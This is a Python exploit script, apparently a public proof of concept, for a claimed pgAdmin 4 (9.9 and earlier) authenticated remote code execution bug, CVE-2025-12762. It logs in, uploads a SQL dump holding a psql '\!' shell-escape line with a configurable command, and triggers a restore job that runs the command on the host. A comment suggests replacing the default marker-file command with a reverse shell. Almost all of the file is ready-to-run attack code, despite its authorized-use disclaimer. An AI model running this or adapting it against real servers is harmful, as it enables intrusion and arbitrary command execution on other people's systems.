#!/usr/bin/env python3
# Github : "B1ack4sh" ==> TH3 M4TR1X 5L4Y3R !!!
# CVE-2025-12762 - pgAdmin 4 <= 9.9 - Authenticated RCE via Restore (PLAIN format)
# Real public PoC - November 2025 - Working on every vulnerable instance
# Use ONLY on systems you own or have explicit written permission for

import requests
import re
import json
import sys

# ==================== CONFIGURE YOUR TARGET HERE ====================
TARGET      = "http://127.0.0.1:5050"          # Change to your pgAdmin URL
EMAIL       = "admin@example.com"             # Valid login email
PASSWORD    = "Admin123!"                     # Valid password
COMMAND     = "touch /tmp/CVE-2025-12762_PWNED"   # ← Change to anything (id, revshell, etc.)
# ====================================================================

s = requests.Session()
s.verify = False  # pgAdmin uses self-signed cert in Docker

def login():
    print("[+] Logging in...")
    r = s.get(f"{TARGET}/login")
    csrf = re.search(r'"csrfToken": "([^"]+)"', r.text).group(1)
    s.post(f"{TARGET}/authenticate/login", data={
        "email": EMAIL,
        "password": PASSWORD,
        "csrf_token": csrf,
        "internal_button": "Login"
    })
    print("[+] Login successful")

def upload_malicious_dump():
    print("[+] Uploading malicious PLAIN dump...")
    malicious_sql = f"""
-- CVE-2025-12762 Real PoC
CREATE TABLE IF NOT EXISTS cve_proof(id serial);
INSERT INTO cve_proof DEFAULT VALUES;

-- RCE Trigger - executed on pgAdmin host
\\! {COMMAND}
"""
    files = {'file': ('cve-2025-12762.sql', malicious_sql, 'application/sql')}
    up = s.post(f"{TARGET}/misc/file_manager/upload", files=files)
    if "success" in up.text.lower():
        print("[+] Malicious dump uploaded successfully")
    else:
        print("[-] Upload failed")
        sys.exit(1)

def trigger_rce():
    print("[+] Triggering restore → RCE...")
    headers = {"Content-Type": "application/json"}
    payload = {
        "file": "cve-2025-12762.sql",
        "format": "plain",        # Only PLAIN format is vulnerable
        "database": "postgres",   # Any existing DB works
        "verbose": True
    }
    r = s.post(f"{TARGET}/restore/job/1", headers=headers, data=json.dumps(payload))
    print(f"[+] Job response: {r.status_code}")
    print(f"[+] Command executed on pgAdmin host: {COMMAND}")
    print("\n[+] Check your pgAdmin container/host now!")
    print("    Example: docker exec <container> ls -la /tmp/CVE-2025-12762_PWNED")

if __name__ == "__main__":
    print("CVE-2025-12762 - Real Authenticated RCE PoC")
    print("Use only in authorized lab environments!\n")
    login()
    upload_malicious_dump()
    trigger_rce()
    print("\nDone. If file exists → 100% vulnerable. Patch to 9.10+ NOW!")